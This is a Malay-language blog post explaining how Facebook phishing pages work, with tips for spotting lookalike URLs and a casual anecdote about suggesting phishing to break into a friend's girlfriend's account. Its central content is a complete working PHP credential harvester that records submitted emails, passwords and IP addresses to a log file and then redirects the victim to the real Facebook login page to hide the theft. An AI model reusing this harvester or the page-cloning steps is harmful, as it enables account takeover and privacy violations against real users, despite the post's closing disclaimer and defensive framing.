Home keselamatan Cara Hasilkan Laman Web Phishing

Assalamualaikum dan salam sejahtera saya ucapkan,

Entri kali ini saya tulis sebab tiba-tiba teringat kisah saya mempelajari phishing dulu. Sebenarnya ada seorang rakan saya yang minta tolong untuk hack akaun Facebook teman wanita kerana bimbang kes kayu tiga… adoi..problem2.. Jadi dari mencari exploit atau hole pada javascript Facebook (sebab dia nak tengok gambar private sahaja) saya cadangkan guna phishing untuk dapat terus akses ke akaun sia dia.hehe… dapat baca mesej sekali kan..

Jadi sebagai menebus tindakan saya dengan nasihat yang kurang beretika diatas, saya menulis artikel ini. Sebabnya sekiranya anda tahu cara untuk melakukan phishing anda pasti akan tahu cara untuk mengatasinya betul tak? Oleh itu, saya hanya terangkan secara ringkas sahaja agar tak disalah gunakan. Cukuplah anda faham bagaimana phishing ini berlaku.

Baiklah sebelum itu, mari kita lihat contoh satu laman web phishing.

facebook phishing

Jadi mudah sahaja bukan, untuk kenal pasti laman web phishing ini, hanya perlu lihat pada URL (ruang yang saya letak box merah kat gambar). Perhatikan URL tersebut bukan http://facebook.com sebaliknya http://faceboak.com . Hanya perbezaan huruf a dan o sahaja tapi berbahaya sebab URL tersebut adalah phishing dan berkeupayaan untuk mencuri password. Untuk mengelak anda tidak tertipu dengan phishing ini pastikan.

  • Perhatikan URL pada browser terutama sekiranya anda login di Cyber Cafe
  • Jangan login melalui email
  • Jangan percaya login dari ruang chat atau yang setara dengannya

Baiklah seterusnya bagaimana laman web phishing ini dihasilkan, Secara teorinya anda hanya perlu menyalin laman web yang asal (sangat-sangat mudah) kemudian anda perlu letakkan jumper pada kod HTML laman web tersebut sebagai contoh.

facebook phishing

(Kod asal)

facebook phishing

(Kod yang ditambah jumper)

Untuk lebih mudah faham pertama sekali jumper ditambah pada kod asal untuk hantar maklumat ke bahagian yang akan merekod email dan kata laluan biasanya kod mudah dari PHP sudah cukup untuk lakukannya. Contoh kod PHP tersebut mungkin seperti dibawah sahaja

<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a'); 
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++"); 
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);

header('Location: https://login.facebook.com/login.php?login_attempt=1');
exit;

Kod PHP tersebut bertugas merekod email dan kata laluan kemudian ia akan redirect browser anda ke laman web yang sebenar dengan notis ‘Login attempt’. Pada ketika ini anda tidak akan perasan kerana anda rasakan seolah-olah anda telah tersilap masukkan  kata laluan, anda mencuba sekali lagi pada laman web yang sebenar tadi dan login tersebut berjaya. Jadi itulah bagaimana phishing ini berfungsi.

Setelah file template palsu tadi telah dipasang jumper serta file PHP telah tersedia kedua-duanya akan dimuat naik ke server hosting. Kebanyakan laman web phishing yang saya jumpa menggunakan hosting percuma jadi sebenarnya jarang untuk anda menjumpai URL yang hampir-hampir sama macam contoh faceboak yang saya berikan diatas.

Sebagai penutup, sekiranya anda berminat untuk membuat phishing ini dan anda ingin mencubanya saya nasihat untuk anda mencuba pada localhost sahaja boleh gunakan XAMPP untuk aktifkan server local ini (server yang hanya pada komputer anda sahaja). Jangan sesekali upload pada mana-mana server  hosting. Kegiatan phishing merupakan satu jenayah. Anda mungkin boleh dikenakan hukuman oleh undang-undang sekiranya ditangkap.

PENAFIAN: SAYA TIDAK BERTANGGUNGJAWAB SEKIRANYA MAKLUMAT INI DISALAHGUNAKAN, TUJUAN ARTIKEL INI DITULIS HANYA UNTUK TUJUAN PEMBELAJARAN SEMATA-MATA. GUNA ATAS RISIKO ANDA.

1 reply to this post

Leave a Reply

Anti-spam: complete the taskWordPress CAPTCHA